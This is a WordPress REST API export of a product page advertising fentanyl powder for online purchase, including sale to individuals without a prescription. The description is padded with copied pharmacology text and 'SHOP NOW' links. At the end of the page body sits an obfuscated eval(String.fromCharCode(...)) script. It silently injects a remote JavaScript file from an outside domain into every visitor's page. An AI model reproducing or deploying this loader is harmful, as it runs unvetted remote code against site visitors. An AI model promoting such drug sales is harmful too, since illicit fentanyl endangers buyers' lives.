{"id":4060,"date":"2025-02-06T21:29:24","date_gmt":"2025-02-06T21:29:24","guid":{"rendered":"https:\/\/exoticchemicals.com\/?post_type=product&#038;p=4060"},"modified":"2026-04-16T05:31:39","modified_gmt":"2026-04-16T05:31:39","slug":"buy-fentanyl-powder-online-2","status":"publish","type":"product","link":"https:\/\/exoticchemicals.com\/tr\/product\/buy-fentanyl-powder-online-2\/","title":{"rendered":"Buy Fentanyl Powder Online"},"content":{"rendered":"<h1>BUY FENTANYL POWDER ONLINE<\/h1>\n<p>Buy Fentanyl Powder Online &#8211;<b> Fentanyl<\/b>, also spelled <a href=\"https:\/\/www.nytimes.com\/2020\/11\/17\/briefing\/virus-vaccines-china-softbank.html\"><strong>fentanil<\/strong><\/a>, is an\u00a0opioid\u00a0used as a\u00a0pain medication\u00a0and together with other medications for\u00a0anesthesia. Fentanyl is also used as a\u00a0recreational drug, often mixed with\u00a0heroin\u00a0or\u00a0cocaine. It has a rapid onset and effects generally last less than two hours. Medically, fentanyl is used by\u00a0injection, as a\u00a0patch on the skin, as a\u00a0nasal spray, or\u00a0in the mouth.<\/p>\n<p>Fentanyl is much stronger than most other opioids\u2014up to 100 times stronger than morphine\u2014and is very dangerous if misused. Even a small amount can cause an overdose and death.<\/p>\n<p>Fentanyl is a powerful pain medication. It is an opioid, like morphine, codeine, oxycodone (oxys) and methadone<\/p>\n<p>Common side effects include\u00a0vomiting,\u00a0constipation, sedation, confusion,\u00a0hallucinations, and injuries related to poor coordination.Serious side effects may include\u00a0decreased breathing\u00a0(respiratory depression),\u00a0serotonin syndrome,\u00a0low blood pressure,\u00a0addiction, or\u00a0coma.<sup id=\"cite_ref-AHFS2017_2-7\" class=\"reference\"><\/sup> Fentanyl works primarily by\u00a0activating\u00a0\u03bc-opioid\u00a0receptors. It is around 100 times stronger than\u00a0morphine, and some analogues such as\u00a0carfentanil\u00a0are around 10,000 times stronger.<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/primarycaremedstore.com\/product\/buy-fentanyl\/\">SHOP NOW!!!<\/a><\/p>\n<h3>What is FENTANYL used for?<\/h3>\n<p>The recreational effects of this compound occur because opioids structurally mimic endogenous endorphins which are naturally found within the body and also work upon the \u03bc-opioid receptor set. The way in which opioids structurally mimic these natural endorphins results in their <a title=\"Physical euphoria\" href=\"https:\/\/psychonautwiki.org\/wiki\/Physical_euphoria\">euphoria<\/a>, <a title=\"Pain relief\" href=\"https:\/\/psychonautwiki.org\/wiki\/Pain_relief\">pain relief<\/a> and <a class=\"mw-redirect\" title=\"Anxiolytic\" href=\"https:\/\/psychonautwiki.org\/wiki\/Anxiolytic\">anxiolytic<\/a> effects. This is because endorphins are responsible for reducing pain, causing sleepiness, and feelings of pleasure. They can be released in response to pain, strenuous exercise, orgasm, or general excitement.<\/p>\n<p>&nbsp;<\/p>\n<h3><\/h3>\n<p>Pure and high-quality of FENTANYL is supplied by our online drug store worldwide and at a veryaffordable price to labs, pharmacies, research centers and individuals.<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/your-drugs.com\/contact-us\/\">contact us<\/a>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>Buy Fentanyl Powder Online<b> &#8211; Fentanyl<\/b>, also spelled\u00a0<b>fentanil<\/b>, is an opioid used as a pain medication and together with other medications for anesthesia.<\/p>","protected":false},"featured_media":4077,"comment_status":"open","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[5540],"product_tag":[2755,2757,5781,2761,2762,2764,2765,2766,2768,1849,5782,5783,5784,5785,5786,2769,2770,1855,5787,5788,5789,5790,5791,5792,5793,5794,2777,5795,5796],"class_list":{"0":"post-4060","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-mdphp-hydrochloride-price-per-gram-research-chemical","7":"product_tag-best-place-to-buy-fentanyl-online","8":"product_tag-best-place-to-buy-fentanyl-patches-online-without-prescription-legit","9":"product_tag-buy-fentanyl-near-me","10":"product_tag-buy-fentanyl-online-without-prescription","11":"product_tag-buy-fentanyl-patches","12":"product_tag-buy-fentanyl-patches-online-in-australia","13":"product_tag-buy-fentanyl-patches-online-in-canada","14":"product_tag-buy-fentanyl-patches-online-in-europe","15":"product_tag-buy-fentanyl-patches-online-in-uk","16":"product_tag-buy-fentanyl-powder-online","17":"product_tag-buy-where-to-buy-fentanyl-online","18":"product_tag-fentani","19":"product_tag-fentanyl","20":"product_tag-fentanyl-canada","21":"product_tag-fentanyl-cost","22":"product_tag-fentanyl-near-me","23":"product_tag-fentanyl-patches","24":"product_tag-fentanyl-powder","25":"product_tag-fentanyl-powder-canada","26":"product_tag-fentanyl-powder-cost","27":"product_tag-fentanyl-powder-near-me","28":"product_tag-fentanyl-powder-ny","29":"product_tag-fentanyl-powder-uk","30":"product_tag-fentanyl-powder-usa","31":"product_tag-fentanyl-uk","32":"product_tag-fentanyl-usa","33":"product_tag-where-can-i-buy-fentanyl-online","34":"product_tag-where-to-buy-fentanyl","35":"product_tag-where-to-buy-fentanyl-powder-online","36":"desktop-align-left","37":"tablet-align-left","38":"mobile-align-left","40":"first","41":"instock","42":"shipping-taxable","43":"purchasable","44":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buy Fentanyl Powder Online -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-fentanyl-powder-online-2\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buy Fentanyl Powder Online -\" \/>\n<meta property=\"og:description\" content=\"Buy Fentanyl Powder Online &#8211; Fentanyl, also spelled\u00a0fentanil, is an opioid used as a pain medication and together with other medications for anesthesia.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-fentanyl-powder-online-2\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-16T05:31:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t<meta property=\"og:image:height\" content=\"291\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/\",\"name\":\"Buy Fentanyl Powder Online -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/FENTANYL-1.jpg\",\"datePublished\":\"2025-02-06T21:29:24+00:00\",\"dateModified\":\"2026-04-16T05:31:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/#primaryimage\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/FENTANYL-1.jpg\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/FENTANYL-1.jpg\",\"width\":350,\"height\":291},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-fentanyl-powder-online-2\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/shop\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Buy Fentanyl Powder Online\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/\",\"name\":\"exotic chemicals\",\"description\":\"Buy MDPHP Hydrochloride\",\"publisher\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/exoticchemicals.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\",\"name\":\"wwalkershop@gmail.com\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"width\":500,\"height\":500,\"caption\":\"wwalkershop@gmail.com\"},\"logo\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\"},\"sameAs\":[\"http:\\\/\\\/exoticchemicals.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Buy Fentanyl Powder Online -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/exoticchemicals.com\/tr\/product\/buy-fentanyl-powder-online-2\/","og_locale":"tr_TR","og_type":"article","og_title":"Buy Fentanyl Powder Online -","og_description":"Buy Fentanyl Powder Online &#8211; Fentanyl, also spelled\u00a0fentanil, is an opioid used as a pain medication and together with other medications for anesthesia.","og_url":"https:\/\/exoticchemicals.com\/tr\/product\/buy-fentanyl-powder-online-2\/","article_modified_time":"2026-04-16T05:31:39+00:00","og_image":[{"width":350,"height":291,"url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Tahmini okuma s\u00fcresi":"1 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/","url":"https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/","name":"Buy Fentanyl Powder Online -","isPartOf":{"@id":"https:\/\/exoticchemicals.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/#primaryimage"},"image":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/#primaryimage"},"thumbnailUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg","datePublished":"2025-02-06T21:29:24+00:00","dateModified":"2026-04-16T05:31:39+00:00","breadcrumb":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/"]}]},{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/#primaryimage","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg","width":350,"height":291},{"@type":"BreadcrumbList","@id":"https:\/\/exoticchemicals.com\/product\/buy-fentanyl-powder-online-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/exoticchemicals.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/exoticchemicals.com\/shop\/"},{"@type":"ListItem","position":3,"name":"Buy Fentanyl Powder Online"}]},{"@type":"WebSite","@id":"https:\/\/exoticchemicals.com\/#website","url":"https:\/\/exoticchemicals.com\/","name":"egzoti\u0307k ki\u0307myasallar","description":"MDPHP Hidroklor\u00fcr Sat\u0131n Al\u0131n","publisher":{"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/exoticchemicals.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":["Person","Organization"],"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7","name":"wwalkershop@gmail.com","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","width":500,"height":500,"caption":"wwalkershop@gmail.com"},"logo":{"@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png"},"sameAs":["http:\/\/exoticchemicals.com"]}]}},"uagb_featured_image_src":{"full":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg",350,291,false],"thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1-150x150.jpg",150,150,true],"medium":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1-300x249.jpg",300,249,true],"medium_large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg",350,291,false],"large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg",350,291,false],"1536x1536":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg",350,291,false],"2048x2048":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg",350,291,false],"trp-custom-language-flag":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg",14,12,false],"woocommerce_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1-300x291.jpg",300,291,true],"woocommerce_single":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1.jpg",350,291,false],"woocommerce_gallery_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/FENTANYL-1-100x100.jpg",100,100,true]},"uagb_author_info":{"display_name":"bossman","author_link":"https:\/\/exoticchemicals.com\/tr\/author\/"},"uagb_comment_info":5,"uagb_excerpt":"Buy Fentanyl Powder Online &#8211; Fentanyl, also spelled\u00a0fentanil, is an opioid used as a pain medication and together with other medications for anesthesia.","_links":{"self":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product\/4060","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/comments?post=4060"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media\/4077"}],"wp:attachment":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media?parent=4060"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_brand?post=4060"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_cat?post=4060"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_tag?post=4060"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}